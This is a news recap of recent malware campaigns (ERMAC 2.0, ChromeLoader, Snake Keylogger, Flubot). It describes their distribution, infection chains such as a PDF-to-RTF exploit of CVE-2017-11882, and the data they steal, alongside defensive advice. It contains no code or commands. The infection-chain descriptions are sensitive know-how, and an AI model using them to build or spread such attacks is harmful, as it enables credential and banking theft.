The past few weeks have highlighted a resurgence of hacker attacks, with old and new industry insights including Flubot, ERMAC 2.0, ChromeLoader and Snake Keylogger.
In the past few hours, various computer emergencies have been reported regarding attacks on user security, from which you can defend yourself by avoiding clicking on the links contained in the messages, always keeping an updated antivirus on your devices, and avoiding downloading cracked programs or apps from stores other than the official ones.
The first threat of this brief recap concerns the ERMAC 2.0 malware which, with points in common with Cerberus, is currently being rented on the dark web at a price of $ 5,000 a month. The viral campaign that sees it as the protagonist, reported by Eset and Bleeping Computer, noted the presence of this virus within 467 applications distributed outside the Play Store, including Bolt Food, a legitimate food delivery app which, however, on a site very similar to the original (advertised with social media posts, phishing e-mails, malvertising, etc), it has been added with the aforementioned threat.
Once installed, the virus goes into action asking for authorization from the accessibility services and, from that moment, it can read and write on the device’s memory, consult the address book, record audio, read and send messages but, above all, superimpose in overlay of forms to legitimate apps or sites, in order to intercept credentials for home banking, asset management services, and for important crypto wallets. The data, once stolen, is then sent to a remote command and control server.
Another fearsome threat spreading this month, although it seems to have been in action since at least February, was reported by Red Canary, and concerns the ChromeLoader malware, which conducts hijacking attacks against browsers on PC and Mac. Specifically, through advertising campaigns on Twitter users are directed to sites containing torrent lists or to compromised sites, with the prospect of being able to download cracks or key generators for games or commercial software. The file that is downloaded, in the case of Windows, is an ISO archive, running which as a virtual driver, the request – via Powershell – to download a remote archive installed locally as an extension for Chrome is decoded, with the consequence that the user it is redirected to fake dating sites, sweepstakes or surveys, adult games, from which criminals make money through affiliation. On macOS, however, the archive file has the DMG format and, via or bash script, downloads and unzips the extension that will change the behavior of Safari in a temporary folder.
The HP Wolf Security division, created in the middle of the pandemic by Hewlett Packard to protect smart working, instead reported the threat concerning the Snake Keylogger info stealer: the latter is spread via e-mail attachments in PDF format that simulate payment receipts . Opening the file, the default computer reader (eg Acrobat Reader) asks to open a docx file whose name contains the words “has been verified”: consequently the user deactivates the protected view lulled by a false sense of security, with the consequence that a macro leads to the execution of a downloaded RTF file which, thanks to the vulnerability CVE-2017-11882 of the Microsoft Equation Editor, via shellcode, sends the downloaded file fresh.exe into action , namely the Snake Keylogger malware, responsible for stealing information such as the login data of Wi-Fi networks, those stored in browsers, or email clients.
From the Romanian security house Bitdefender comes the report of a new diffusion campaign for the Flubot virus. In this case, the virus spreads by SMS with links that invite you to click to listen to an audio message: the click leads to the request to install an alleged Android app for managing voice messages which, in addition to requesting accessibility services to take the full control of the device, it also requires access to the address book (which the user grants, deeming it normal for a messaging app). In reality, once the permissions have been granted, the malware comes into action which, spreading by SMS to the victim’s contacts, in the meantime steals their personal and banking information and their credit card information. On iOS, the virus acts differently, taking the user to sites where he can subscribe to paid services or which will try to steal his credentials in other ways.